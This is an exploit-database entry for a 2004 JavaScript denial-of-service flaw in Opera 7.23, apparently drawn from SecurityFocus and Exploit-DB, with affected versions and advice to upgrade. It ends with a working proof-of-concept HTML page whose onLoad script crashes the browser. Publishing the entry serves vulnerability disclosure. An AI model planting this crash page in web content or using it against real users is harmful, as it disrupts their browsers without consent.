Opera Web Browser JavaScript Denial of Service Vulnerability

vendor:

Opera Web Browser

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Opera Web Browser

Affected Version From: 7.23

Affected Version To: 7.54

Patch Exists: YES

Related CWE: N/A

CPE: opera

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Microsoft Windows, Linux, Unix variants and Apple MacOS

2004

Opera Web Browser JavaScript Denial of Service Vulnerability

Opera is reported to be susceptible to a JavaScript denial of Service vulnerability. This vulnerability presents itself when Opera attempts to execute a specific JavaScript command. Upon executing this command, Opera will reportedly crash.

Mitigation:

Upgrade to the latest version of Opera Web Browser.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11090/info

Opera is a web browser available for a number of platforms, including Microsoft Windows, Linux and Unix variants and Apple MacOS.

Opera Web Browser is reported to be susceptible to a JavaScript denial of service vulnerability. This vulnerability presents itself when Opera attempts to execute a specific JavaScript command. Upon executing this command, Opera will reportedly crash.

This vulnerability was reported to exist in version 7.23 of Opera for Microsoft Windows. Other versions are also likely affected. Version 7.54 does not seem to be susceptible. 

<html><head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script></head>
<body onLoad="dSend()">
<embed src="" type="CCCC" name="crash" >
</embed>
</body></html>